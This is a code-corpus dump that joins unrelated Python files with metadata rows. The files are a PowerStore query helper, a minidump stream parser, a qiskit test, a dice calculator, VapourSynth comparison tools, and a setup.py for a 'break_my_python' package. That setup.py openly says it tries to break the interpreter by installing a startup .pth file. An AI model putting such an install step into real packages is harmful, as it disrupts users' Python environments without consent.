                            ' parameters only. Please enter a valid operator'
                            ' and parameter combination')
if isinstance(resource[key], int) and\
int(split_list[1]) > resource[key]:
count += 1
if isinstance(resource[key], float) and \
float(split_list[1]) > resource[key]:
count += 1
return count
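
# A minimal, self-contained sketch of the helpers above (the resource dicts
# are made-up sample data, not real PowerStore responses):
if __name__ == '__main__':
    print(prepare_querystring({'select': 'id,name'}, limit=10))
    # -> {'select': 'id,name', 'limit': 10}

    volumes = [{'id': 'v1', 'name': 'vol-prod', 'size': 20},
               {'id': 'v2', 'name': 'vol-test', 'size': 5}]
    # Keep volumes whose name contains 'prod' and whose size is greater than 10
    print(filtered_details(['name', 'size'],
                           {'name': 'ilike.*prod*', 'size': 'gt.10'},
                           volumes, 'volume'))
    # -> [{'id': 'v1', 'name': 'vol-prod'}]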
| 35.373333
| 78
| 0.602714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,848
| 0.348285
|
0ceb7ee6367f4094900b7a7ad37575ea6ba9548d
| 5,680
|
py
|
Python
|
minidump/streams/MiscInfoStream.py
|
lucasg/minidump
|
18474e3221038abe866256e4e0eb255e33615110
|
[
"MIT"
] | 1
|
2021-06-13T10:00:44.000Z
|
2021-06-13T10:00:44.000Z
|
minidump/streams/MiscInfoStream.py
|
lucasg/minidump
|
18474e3221038abe866256e4e0eb255e33615110
|
[
"MIT"
] | null | null | null |
minidump/streams/MiscInfoStream.py
|
lucasg/minidump
|
18474e3221038abe866256e4e0eb255e33615110
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
#
# Author:
# Tamas Jos (@skelsec)
#
import io
import enum
#https://msdn.microsoft.com/en-us/library/windows/desktop/ms680388(v=vs.85).aspx
class MinidumpMiscInfo2Flags1(enum.IntFlag):
MINIDUMP_MISC1_PROCESS_ID = 0x00000001 #ProcessId is used.
MINIDUMP_MISC1_PROCESS_TIMES = 0x00000002 #ProcessCreateTime, ProcessKernelTime, and ProcessUserTime are used.
MINIDUMP_MISC1_PROCESSOR_POWER_INFO = 0x00000004 #ProcessorMaxMhz, ProcessorCurrentMhz, ProcessorMhzLimit, ProcessorMaxIdleState, and ProcessorCurrentIdleState are used.
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms680389(v=vs.85).aspx
class MinidumpMiscInfoFlags1(enum.IntFlag):
MINIDUMP_MISC1_PROCESS_ID = 0x00000001 #ProcessId is used.
MINIDUMP_MISC1_PROCESS_TIMES = 0x00000002 #ProcessCreateTime, ProcessKernelTime, and ProcessUserTime are used.
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms680389(v=vs.85).aspx
class MINIDUMP_MISC_INFO:
size = 24
def __init__(self):
self.SizeOfInfo = None
self.Flags1 = None
self.ProcessId = None
self.ProcessCreateTime = None
self.ProcessUserTime = None
self.ProcessKernelTime = None
	@staticmethod
	def parse(buff):
mmi = MINIDUMP_MISC_INFO()
mmi.SizeOfInfo = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
mmi.Flags1 = MinidumpMiscInfoFlags1(int.from_bytes(buff.read(4), byteorder = 'little', signed = False))
if mmi.Flags1 & MinidumpMiscInfoFlags1.MINIDUMP_MISC1_PROCESS_ID:
mmi.ProcessId = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
else:
buff.read(4)
if mmi.Flags1 & MinidumpMiscInfoFlags1.MINIDUMP_MISC1_PROCESS_TIMES:
mmi.ProcessCreateTime = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
mmi.ProcessUserTime = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
mmi.ProcessKernelTime = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
else:
buff.read(12)
return mmi
#https://msdn.microsoft.com/en-us/library/windows/desktop/ms680388(v=vs.85).aspx
class MINIDUMP_MISC_INFO_2:
size = 44
def __init__(self):
self.SizeOfInfo = None
self.Flags1 = None
self.ProcessId = None
self.ProcessCreateTime = None
self.ProcessUserTime = None
self.ProcessKernelTime = None
self.ProcessorMaxMhz = None
self.ProcessorCurrentMhz = None
self.ProcessorMhzLimit = None
self.ProcessorMaxIdleState = None
self.ProcessorCurrentIdleState = None
	@staticmethod
	def parse(buff):
mmi = MINIDUMP_MISC_INFO_2()
mmi.SizeOfInfo = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
mmi.Flags1 = MinidumpMiscInfo2Flags1(int.from_bytes(buff.read(4), byteorder = 'little', signed = False))
if mmi.Flags1 & MinidumpMiscInfo2Flags1.MINIDUMP_MISC1_PROCESS_ID:
mmi.ProcessId = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
else:
buff.read(4)
if mmi.Flags1 & MinidumpMiscInfo2Flags1.MINIDUMP_MISC1_PROCESS_TIMES:
mmi.ProcessCreateTime = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
mmi.ProcessUserTime = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
mmi.ProcessKernelTime = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
else:
buff.read(12)
if mmi.Flags1 & MinidumpMiscInfo2Flags1.MINIDUMP_MISC1_PROCESSOR_POWER_INFO:
mmi.ProcessorMaxMhz = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
mmi.ProcessorCurrentMhz = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
mmi.ProcessorMhzLimit = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
mmi.ProcessorMaxIdleState = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
mmi.ProcessorCurrentIdleState = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
else:
buff.read(20)
return mmi
class MinidumpMiscInfo:
def __init__(self):
self.ProcessId = None
self.ProcessCreateTime = None
self.ProcessUserTime = None
self.ProcessKernelTime = None
self.ProcessorMaxMhz = None
self.ProcessorCurrentMhz = None
self.ProcessorMhzLimit = None
self.ProcessorMaxIdleState = None
self.ProcessorCurrentIdleState = None
	@staticmethod
	def parse(directory, buff):  # 'directory' avoids shadowing the dir() builtin
		t = MinidumpMiscInfo()
		buff.seek(directory.Location.Rva)
		chunk = io.BytesIO(buff.read(directory.Location.DataSize))
		if directory.Location.DataSize == MINIDUMP_MISC_INFO.size:
misc = MINIDUMP_MISC_INFO.parse(chunk)
t.ProcessId = misc.ProcessId
t.ProcessCreateTime = misc.ProcessCreateTime
t.ProcessUserTime = misc.ProcessUserTime
t.ProcessKernelTime = misc.ProcessKernelTime
else:
misc = MINIDUMP_MISC_INFO_2.parse(chunk)
t.ProcessId = misc.ProcessId
t.ProcessCreateTime = misc.ProcessCreateTime
t.ProcessUserTime = misc.ProcessUserTime
t.ProcessKernelTime = misc.ProcessKernelTime
t.ProcessorMaxMhz = misc.ProcessorMaxMhz
t.ProcessorCurrentMhz = misc.ProcessorCurrentMhz
t.ProcessorMhzLimit = misc.ProcessorMhzLimit
t.ProcessorMaxIdleState = misc.ProcessorMaxIdleState
t.ProcessorCurrentIdleState = misc.ProcessorCurrentIdleState
return t
def __str__(self):
t = '== MinidumpMiscInfo ==\n'
t += 'ProcessId %s\n' % self.ProcessId
t += 'ProcessCreateTime %s\n' % self.ProcessCreateTime
t += 'ProcessUserTime %s\n' % self.ProcessUserTime
t += 'ProcessKernelTime %s\n' % self.ProcessKernelTime
t += 'ProcessorMaxMhz %s\n' % self.ProcessorMaxMhz
t += 'ProcessorCurrentMhz %s\n' % self.ProcessorCurrentMhz
t += 'ProcessorMhzLimit %s\n' % self.ProcessorMhzLimit
t += 'ProcessorMaxIdleState %s\n' % self.ProcessorMaxIdleState
t += 'ProcessorCurrentIdleState %s\n' % self.ProcessorCurrentIdleState
return t
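
# A self-contained round-trip sketch: hand-pack a 24-byte MISC_INFO record
# (little-endian, flags = PROCESS_ID | PROCESS_TIMES) and parse it back.
if __name__ == '__main__':
	import struct
	raw = struct.pack('<6I', 24, 0x3, 4242, 1600000000, 50, 60)
	info = MINIDUMP_MISC_INFO.parse(io.BytesIO(raw))
	print(info.ProcessId)          # 4242
	print(info.ProcessCreateTime)  # 1600000000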
| 42.074074
| 170
| 0.757394
| 5,257
| 0.925528
| 0
| 0
| 0
| 0
| 0
| 0
| 1,055
| 0.185739
|
0cec7a7b14ee446e6efc190805ad0c86fcf9567d
| 2,565
|
py
|
Python
|
test/python/transpiler/test_transpile.py
|
filemaster/qiskit-terra
|
8672c407a5a0e34405315f82d5ad5847916e857e
|
[
"Apache-2.0"
] | null | null | null |
test/python/transpiler/test_transpile.py
|
filemaster/qiskit-terra
|
8672c407a5a0e34405315f82d5ad5847916e857e
|
[
"Apache-2.0"
] | null | null | null |
test/python/transpiler/test_transpile.py
|
filemaster/qiskit-terra
|
8672c407a5a0e34405315f82d5ad5847916e857e
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2018, IBM.
#
# This source code is licensed under the Apache License, Version 2.0 found in
# the LICENSE.txt file in the root directory of this source tree.
# pylint: disable=redefined-builtin
"""Tests basic functionality of the transpile function"""
from qiskit import QuantumRegister, QuantumCircuit
from qiskit import compile, BasicAer
from qiskit.transpiler import PassManager, transpile_dag, transpile
from qiskit.tools.compiler import circuits_to_qobj
from qiskit.converters import circuit_to_dag
from ..common import QiskitTestCase
class TestTranspile(QiskitTestCase):
"""Test transpile function."""
def test_pass_manager_empty(self):
"""Test passing an empty PassManager() to the transpiler.
It should perform no transformations on the circuit.
"""
qr = QuantumRegister(2)
circuit = QuantumCircuit(qr)
circuit.h(qr[0])
circuit.h(qr[0])
circuit.cx(qr[0], qr[1])
circuit.cx(qr[0], qr[1])
circuit.cx(qr[0], qr[1])
circuit.cx(qr[0], qr[1])
dag_circuit = circuit_to_dag(circuit)
resources_before = dag_circuit.count_ops()
pass_manager = PassManager()
dag_circuit = transpile_dag(dag_circuit, pass_manager=pass_manager)
resources_after = dag_circuit.count_ops()
self.assertDictEqual(resources_before, resources_after)
def test_pass_manager_none(self):
"""Test passing the default (None) pass manager to the transpiler.
It should perform the default qiskit flow:
unroll, swap_mapper, cx_direction, cx_cancellation, optimize_1q_gates
and should be equivalent to using tools.compile
"""
qr = QuantumRegister(2, 'qr')
circuit = QuantumCircuit(qr)
circuit.h(qr[0])
circuit.h(qr[0])
circuit.cx(qr[0], qr[1])
circuit.cx(qr[0], qr[1])
circuit.cx(qr[0], qr[1])
circuit.cx(qr[0], qr[1])
coupling_map = [[1, 0]]
basis_gates = 'u1,u2,u3,cx,id'
backend = BasicAer.get_backend('qasm_simulator')
circuit2 = transpile(circuit, backend, coupling_map=coupling_map, basis_gates=basis_gates,
pass_manager=None)
qobj = compile(circuit, backend=backend, coupling_map=coupling_map, basis_gates=basis_gates)
qobj2 = circuits_to_qobj(circuit2, backend.name(), basis_gates=basis_gates,
coupling_map=coupling_map, qobj_id=qobj.qobj_id)
self.assertEqual(qobj, qobj2)
| 34.2
| 100
| 0.665107
| 1,982
| 0.77271
| 0
| 0
| 0
| 0
| 0
| 0
| 741
| 0.288889
|
0cee3a5d83fc06ee8d80703cbf5bab61011eb8f9
| 7,039
|
py
|
Python
|
repiko/module/calculator.py
|
liggest/RepiKoBot
|
5a2aa511e747785ad341c60d809af2a2788963ab
|
[
"MIT"
] | 1
|
2021-07-29T13:23:58.000Z
|
2021-07-29T13:23:58.000Z
|
repiko/module/calculator.py
|
liggest/RepiKoBot
|
5a2aa511e747785ad341c60d809af2a2788963ab
|
[
"MIT"
] | null | null | null |
repiko/module/calculator.py
|
liggest/RepiKoBot
|
5a2aa511e747785ad341c60d809af2a2788963ab
|
[
"MIT"
] | null | null | null |
import random
class Calculator():
symbol=["+","-","*","/","(",")"]
def __init__(self):
pass
def cal(self,s):
if self.isnumber(s[0]):
return s
elif s[0]=="error":
return ["error",s[1]]
elif "(" in s[0] or ")" in s[0]: #or "^" in s[0]:
el=self.analyze(s)
e=el[0]
log=el[1]
return self.cal([e,log])
else:
e=s[0]
log=s[1]
if "-" in e:
ex=e
for x in range(len(e)):
if e[x]=="-":
if x==0:
ex="–"+ex[1:]
elif e[x-1] in self.symbol:
ex=ex[:x]+"–"+ex[x+1:]
e=ex
if "*" in e or "/" in e:
length=len(e)
lastMark=-1
thisMark=0
nextMark=length
mark="*"
for x in range(length):
if e[x]=="*" or e[x]=="/":
thisMark=x
mark=e[x]
for y in range(thisMark+1,length):
if e[y] in self.symbol:
nextMark=y
break
for y in range(thisMark-1,-1,-1):
if e[y] in self.symbol:
lastMark=y
break
target_l=e[lastMark+1:thisMark].replace("–","-")
target_r=e[thisMark+1:nextMark].replace("–","-")
if not self.isnumber(target_l):
target=self.cal([target_l,log])
target_l=target[0]
log=target[1]
if not self.isnumber(target_r):
target=self.cal([target_r,log])
target_r=target[0]
log=target[1]
if target_r=="error" or target_l=="error":
return ["error",log]
if mark=="*":
result_temp=str(float(target_l)*float(target_r))
elif mark=="/" and target_r!="0":
result_temp=str(float(target_l)/float(target_r))
else:
return ["error",log]
e=e[:lastMark+1]+result_temp+e[nextMark:]
log=log+e+"\n"
break
elif "+" in e or "-" in e:
length=len(e)
lastMark=-1
thisMark=0
nextMark=length
mark="+"
for x in range(length):
if e[x]=="+" or e[x]=="-":
thisMark=x
mark=e[x]
for y in range(thisMark+1,length):
if e[y] in self.symbol:
nextMark=y
break
for y in range(thisMark-1,-1,-1):
if e[y] in self.symbol:
lastMark=y
break
target_l=e[lastMark+1:thisMark].replace("–","-")
target_r=e[thisMark+1:nextMark].replace("–","-")
if not self.isnumber(target_l):
target=self.cal([target_l,log])
target_l=target[0]
log=target[1]
if not self.isnumber(target_r):
target=self.cal([target_r,log])
target_r=target[0]
log=target[1]
if target_r=="error" or target_l=="error":
return ["error",log]
if mark=="+":
result_temp=str(float(target_l)+float(target_r))
elif mark=="-":
result_temp=str(float(target_l)-float(target_r))
else:
return ["error",log]
e=e[:lastMark+1]+result_temp+e[nextMark:]
log=log+e+"\n"
break
else:
return ["error",log]
return self.cal([e,log])
def analyze(self,s):
e=s[0]
log=s[1]
while "(" in e or ")" in e:
bracketL=0
bracketR=0
length=len(e)
for x in range(length-1,-1,-1):
if e[x]=="(":
bracketL=x
bracketR=e[x:].find(")")+x
break
rs=e[bracketL+1:bracketR]
log=log+rs+"\n"
result_temp=self.cal([rs,log])
if result_temp[0]=="error":
return ["error",result_temp[1]]
e=e[:bracketL]+result_temp[0]+e[bracketR+1:]
log=result_temp[1]+e+"\n"
return [e,log]
def isnumber(self,s):
try :
float(s)
return True
except:
return False
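
    # Note on dice(): it expands NdM dice notation in place, e.g. "3d6" ->
    # "(4+2+5)". The playful Chinese error strings below translate roughly as:
    #   "-丢了个卵子" -> "rolled a dud (a zero-sided die)"
    #   "-丢了一群卵子" -> "rolled a whole pile of duds (too many dice)"
    #   "-丢不出卵子,只能丢人了" -> "no dice to roll, only embarrassment"
    # dicetext()'s fallback "呜…投个骰子都卡住了……" reads as "ugh... even the
    # die roll got stuck...".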
def dice(self,s):
e=s
while "d" in e:
length=len(e)
dn=e.find("d")
start=-1
end=length
for x in range(dn+1,length):
if not e[x].isdecimal():
end=x
break
for y in range(dn-1,-1,-1):
if not e[y].isdecimal():
start=y
break
startn=e[start+1:dn]
endn=e[dn+1:end]
if startn=="":
startn=1
else:
startn=abs(int(startn))
if endn=="":
endn=100
else:
endn=abs(int(endn))
if endn!=0 and startn<=100 and startn!=0:
result_temp="("
for z in range(startn):
result_temp+=str(random.randint(1,endn))
if z!=startn-1:
result_temp+="+"
result_temp+=")"
elif endn==0:
return "-丢了个卵子"
elif startn>100:
return "-丢了一群卵子"
elif startn==0:
return "-丢不出卵子,只能丢人了"
e=e[:start+1]+result_temp+e[end:]
return e
def dicetext(self,s,act):
text=self.dice(s)
if text[0:2]=="-丢":
return text[1:]
num=self.cal([text,text+"\n"])
if num[0]!="error":
return "投掷 "+act+" :"+s+" = "+text+" = "+num[0]
else:
return "呜…投个骰子都卡住了……"
#x=Calculator()
#a=input()
#r=x.cal([a,a+"\n"])
#print(r[1][:-1])
#if r[0]=="error":
# print("error")
#print(x.dicetext(a,""))
| 36.661458
| 76
| 0.356016
| 6,980
| 0.979649
| 0
| 0
| 0
| 0
| 0
| 0
| 547
| 0.076772
|
0cf0a226855cb91425b2c33151d95bfc025b95b0
| 624
|
py
|
Python
|
tests/retrieve/test_segment.py
|
openghg/openghg
|
9a05dd6fe3cee6123898b8f390cfaded08dbb408
|
[
"Apache-2.0"
] | 5
|
2021-03-02T09:04:07.000Z
|
2022-01-25T09:58:16.000Z
|
tests/retrieve/test_segment.py
|
openghg/openghg
|
9a05dd6fe3cee6123898b8f390cfaded08dbb408
|
[
"Apache-2.0"
] | 229
|
2020-09-30T15:08:39.000Z
|
2022-03-31T14:23:55.000Z
|
tests/retrieve/test_segment.py
|
openghg/openghg
|
9a05dd6fe3cee6123898b8f390cfaded08dbb408
|
[
"Apache-2.0"
] | null | null | null |
# import os
# import uuid
# import numpy as np
# import pandas as pd
# import pytest
# mocked_uuid = "00000000-0000-1111-00000-000000000000"
# @pytest.fixture(scope="session")
# def data():
# filename = "bsd.picarro.1minute.248m.dat"
# dir_path = os.path.dirname(__file__)
# test_data = "../data/proc_test_data/CRDS"
# filepath = os.path.join(dir_path, test_data, filename)
# return pd.read_csv(filepath, header=None, skiprows=1, sep=r"\s+")
# @pytest.fixture
# def mock_uuid(monkeypatch):
# def mock_uuid():
# return mocked_uuid
# monkeypatch.setattr(uuid, "uuid4", mock_uuid)
| 21.517241
| 71
| 0.674679
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 596
| 0.955128
|
0cf19d7af68dc81b523b12d529be9b1094af28ac
| 891
|
py
|
Python
|
setup.py
|
jjhelmus/break_my_python
|
4f8165fa3ae2bbe72b21f49156598387ee18b94a
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
jjhelmus/break_my_python
|
4f8165fa3ae2bbe72b21f49156598387ee18b94a
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
jjhelmus/break_my_python
|
4f8165fa3ae2bbe72b21f49156598387ee18b94a
|
[
"BSD-3-Clause"
] | null | null | null |
from setuptools import setup
with open('README.md') as f:
long_description = f.read()
setup(
name='break_my_python',
version='0.0.2',
    description='This package tries to break your Python interpreter, do not install it',
long_description=long_description,
author='Jonathan J. Helmus',
author_email='jjhelmus@gmail.com',
url='http://pypi.python.org/pypi/break_my_python/',
license='LICENSE.txt',
py_modules=['break_my_python'],
data_files=[('/', ['break_my_python.pth'])],
classifiers=[
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
]
)
| 31.821429
| 90
| 0.655443
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 547
| 0.613917
|
0cf1bfd01d728cb0a54ff17ffb5bf2c3afbfaf92
| 12,039
|
py
|
Python
|
n4ofunc/comp.py
|
noaione/n4ofunc
|
81a69de67284f9685d1f88cb34f7d3d2d0ce19c1
|
[
"MIT"
] | 4
|
2018-05-28T05:05:01.000Z
|
2020-03-24T15:01:24.000Z
|
n4ofunc/comp.py
|
noaione/n4ofunc
|
81a69de67284f9685d1f88cb34f7d3d2d0ce19c1
|
[
"MIT"
] | null | null | null |
n4ofunc/comp.py
|
noaione/n4ofunc
|
81a69de67284f9685d1f88cb34f7d3d2d0ce19c1
|
[
"MIT"
] | null | null | null |
"""
MIT License
Copyright (c) 2020-present noaione
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import shutil
import sys
from functools import partial
from pathlib import Path
from typing import Dict, Generator, List, NamedTuple, NoReturn, Optional, Tuple
import vapoursynth as vs
from vsutil import get_w, get_y
from .utils import has_plugin_or_raise
__all__ = (
"check_difference",
"save_difference",
"stack_compare",
"interleave_compare",
"compare",
)
core = vs.core
class FrameDiff(NamedTuple):
frame: vs.VideoNode
number: int
difference: float
def _pad_video_length(clip_a: vs.VideoNode, clip_b: vs.VideoNode) -> Tuple[vs.VideoNode, vs.VideoNode]:
clip_a_length = clip_a.num_frames
clip_b_length = clip_b.num_frames
if clip_a_length == clip_b_length:
return clip_a, clip_b
elif clip_a_length > clip_b_length:
src_add = clip_a_length - clip_b_length
clip_b = clip_b + (clip_b[-1] * src_add)
elif clip_b_length > clip_a_length:
src_add = clip_b_length - clip_a_length
clip_a = clip_a + (clip_a[-1] * src_add)
return clip_a, clip_b
def _preprocess_clips(clip_a: vs.VideoNode, clip_b: vs.VideoNode) -> Tuple[vs.VideoNode, vs.VideoNode]:
if not isinstance(clip_a, vs.VideoNode):
raise TypeError("clip_a must be a clip")
if not isinstance(clip_b, vs.VideoNode):
raise TypeError("clip_b must be a clip")
has_plugin_or_raise("fmtc")
clipa_cf = clip_a.format.color_family
clipb_cf = clip_b.format.color_family
clipa_bits = clip_a.format.bits_per_sample
clipb_bits = clip_b.format.bits_per_sample
clip_a, clip_b = _pad_video_length(clip_a, clip_b)
if clipa_cf != vs.RGB:
clip_a = clip_a.resize.Point(format=vs.RGBS, matrix_in_s="709")
if clipb_cf != vs.RGB:
clip_b = clip_b.resize.Point(format=vs.RGBS, matrix_in_s="709")
if clipa_bits != 8:
clip_a = clip_a.fmtc.bitdepth(bits=8)
if clipb_bits != 8:
clip_b = clip_b.fmtc.bitdepth(bits=8)
return clip_a, clip_b
def _frame_yielder(
clip_a: vs.VideoNode, clip_b: vs.VideoNode, threshold: float = 0.1
) -> Generator[Tuple[int, vs.RawFrame], None, None]:
clip_a_gray = clip_a.std.ShufflePlanes(0, vs.GRAY)
clip_b_gray = clip_b.std.ShufflePlanes(0, vs.GRAY)
frame: vs.RawFrame
for num, frame in enumerate(core.std.PlaneStats(clip_a_gray, clip_b_gray).frames()): # type: ignore
if frame.props["PlaneStatsDiff"] >= threshold: # type: ignore
yield num, frame
def check_difference(
clip_a: vs.VideoNode,
clip_b: vs.VideoNode,
threshold: float = 0.1,
) -> NoReturn:
if not hasattr(sys, "argv"): # Simple check if script are opened via VSEdit
raise Exception(
"check_difference: please run this vpy script via command-line (ex: python3 ./script.vpy)"
)
clip_a, clip_b = _preprocess_clips(clip_a, clip_b)
last_known_diff = -1
known_diff = 0
try:
for num, _ in _frame_yielder(clip_a, clip_b, threshold):
if last_known_diff != num:
print(f"check_difference: Frame {num} is different")
known_diff += 1
last_known_diff = num + 1
except KeyboardInterrupt:
print("check_difference: Process interrupted")
exit(1)
if known_diff == 0:
print(f"check_difference: No difference found (threshold: {threshold})")
exit(0)
def save_difference(
clip_a: vs.VideoNode,
clip_b: vs.VideoNode,
threshold: float = 0.1,
output_filename: List[str] = ["src1", "src2"],
) -> NoReturn:
if not hasattr(sys, "argv"): # Simple check if script are opened via VSEdit
raise Exception(
"save_difference: please run this vpy script via command-line (ex: python3 ./script.vpy)"
)
if len(output_filename) != 2:
raise Exception("save_difference: output_filename must be a tuple of two strings")
has_plugin_or_raise("imwri")
clip_a, clip_b = _preprocess_clips(clip_a, clip_b)
fn_a, fn_b = output_filename
# Get current directory of the file
filename = Path(sys.argv[0]).resolve()
current_dir = filename.parent
only_fn = filename.name.split(".", 1)[0]
target_dir = current_dir / f"{only_fn}_frame_difference"
target_dir.mkdir(exist_ok=True)
differences_data: Dict[str, FrameDiff] = {}
known_diff = 0
last_known_diff = -1
try:
for num, frame in _frame_yielder(clip_a, clip_b, threshold):
if last_known_diff != num:
differences_data[f"{known_diff}_{fn_a}"] = FrameDiff(
frame=clip_a[num],
number=num,
difference=frame.props["PlaneStatsDiff"], # type: ignore
)
differences_data[f"{known_diff}_{fn_b}"] = FrameDiff(
frame=clip_b[num],
number=num,
difference=frame.props["PlaneStatsDiff"], # type: ignore
)
known_diff += 1
last_known_diff = num + 1
except KeyboardInterrupt:
print("save_difference: Process interrupted")
exit(1)
if known_diff == 0:
print(f"check_difference: No difference found (threshold: {threshold})")
shutil.rmtree(str(target_dir))
exit(0)
print(f"save_difference: {known_diff} differences found, saving images...")
try:
for filename, frame_info in differences_data.items():
print(f"save_difference: saving frame: {frame_info.number} ({frame_info.difference})")
actual_target = target_dir / f"{filename} (%05d).png"
out: vs.VideoNode = core.imwri.Write(
frame_info.frame, imgformat="PNG", filename=str(actual_target), firstnum=frame_info.number
)
out.get_frame(0)
except KeyboardInterrupt:
print("save_difference: Process interrupted")
exit(1)
exit(0)
def stack_compare(
clips: List[vs.VideoNode],
height: Optional[int] = None,
identity: bool = False,
max_vertical_stack: int = 2,
interleave_only: bool = False,
):
"""
Stack/interleave compare multiple clips.
Probably inspired by LightArrowsEXE ``stack_compare`` function.
Clips are stacked like this:
-------------
| A | C | E |
-------------
| B | D | F |
------------- -- (For max_vertical_stack = 2)
etc...
    If the number of clips doesn't fill the grid, extra BlankClips are added as padding.
    Formula: `multiples_of_max_vertical_stack[i] <= clip_total <= multiples_of_max_vertical_stack[i + 1]`
    If any clip has only a `Y` plane, all clips are reduced to their luma plane.
    The maximum number of vertically stacked clips can be changed via `max_vertical_stack`.
Parameters
----------
clips: :class:`List[VideoNode]`
A collection of clips or sources to compare.
height: :class:`Optional[int]`
Resize the stacked compare into a new height.
If ``interleave_only`` is ``True``, this will be ignored.
identity: :class:`bool`
If ``True``, there will be numbering to identify each clips.
If ``interleave_only`` is ``True``, this will be ignored.
max_vertical_stack: :class:`int`
The maximum number of clips to stack vertically.
If ``interleave_only`` is ``True``, this will be ignored.
interleave_only: :class:`bool`
        If ``True``, the output will be an interleaved comparison.
Returns
-------
:class:`VideoNode`
A stacked/interleaved compare of the clips.
"""
the_string = "ABCDEFGHIJKLMNOPQRSTUVWXYZ123456789abcefghijklmnopqrstuvwxyz"
if len(clips) < 2:
raise ValueError("stack_compare: please provide 2 or more clips.")
has_plugin_or_raise("sub")
def _fallback_str(num: int) -> str:
try:
return the_string[num]
except IndexError:
return f"Extra{num + 1}"
def _generate_ident(clip_index: int, src_w: int, src_h: int) -> str:
gen = r"{\an7\b1\bord5\c&H00FFFF\pos"
gen += "({w}, {h})".format(w=25 * (src_w / 1920), h=25 * (src_h / 1080))
gen += r"\fs" + "{0}".format(60 * (src_h / 1080)) + r"}"
gen += "Clip {0}".format(_fallback_str(clip_index))
return gen
# Check for luma only clip
only_use_luma = False
for clip in clips:
if clip.format.num_planes == 1:
only_use_luma = True
break
if interleave_only:
if only_use_luma:
clips = [get_y(clip) for clip in clips]
# Set identity
if identity:
clips = [
clip.sub.Subtitle(
_generate_ident(
idx,
clip.width,
clip.height,
)
)
for idx, clip in enumerate(clips)
]
return core.std.Interleave(clips, mismatch=True)
def _calculate_needed_clip(max_vert: int, clip_total: int) -> int:
multiples_of = list(range(max_vert, (clip_total + 1) * max_vert, max_vert))
multiples_of_total = len(multiples_of)
max_needed = 1
for i in range(multiples_of_total):
if i + 1 == multiples_of_total - 1:
break
if multiples_of[i] <= clip_total <= multiples_of[i + 1]:
max_needed = multiples_of[i + 1]
break
return max_needed
# Set YUV video to Y video if only_use_luma.
if only_use_luma:
clips = [get_y(clip) for clip in clips]
if identity:
clips = [
clip.sub.Subtitle(_generate_ident(ind, clip.width, clip.height)) for ind, clip in enumerate(clips)
]
# Find needed clip for current `max_vertical_stack`.
if len(clips) != max_vertical_stack:
needed_clip = _calculate_needed_clip(max_vertical_stack, len(clips))
f_clip = clips[0]
for _ in range(needed_clip - len(clips)):
clips.append(
core.std.BlankClip(f_clip).sub.Subtitle(
r"{\an5\fs120\b1\pos("
+ "{},{}".format(f_clip.width / 2, f_clip.height / 2)
+ r")}BlankClip Pad\N(Ignore)"
)
)
# Split into chunks of `max_vertical_stack` and StackVertical it.
# Input: [A, B, C, D, E, F, G, H]
# Output: [[A, B], [C, D], [E, F], [G, H]]
clips = [
core.std.StackVertical(clips[i : i + max_vertical_stack])
for i in range(0, len(clips), max_vertical_stack)
]
final_clip = core.std.StackHorizontal(clips) if len(clips) > 1 else clips[0]
if height:
if height != final_clip.height:
ar = final_clip.width / final_clip.height
final_clip = final_clip.resize.Bicubic(
get_w(height, ar),
height,
)
return final_clip
interleave_compare = partial(stack_compare, interleave_only=True)
compare = stack_compare
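
# A hedged usage sketch for a .vpy script (the lsmas source plugin and the
# file names are assumptions; substitute your own sources):
#
#   import vapoursynth as vs
#   from n4ofunc import stack_compare, interleave_compare
#   core = vs.core
#   src_a = core.lsmas.LWLibavSource("episode01_tv.mkv")
#   src_b = core.lsmas.LWLibavSource("episode01_bd.mkv")
#   stack_compare([src_a, src_b], height=720, identity=True).set_output()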
| 35.201754
| 110
| 0.631614
| 90
| 0.007476
| 482
| 0.040037
| 0
| 0
| 0
| 0
| 4,237
| 0.35194
|
0cf20d68ff93bb50029ab4621417fc5c929819f7
| 11,612
|
py
|
Python
|
mpas_analysis/ocean/time_series_sst.py
|
alicebarthel/MPAS-Analysis
|
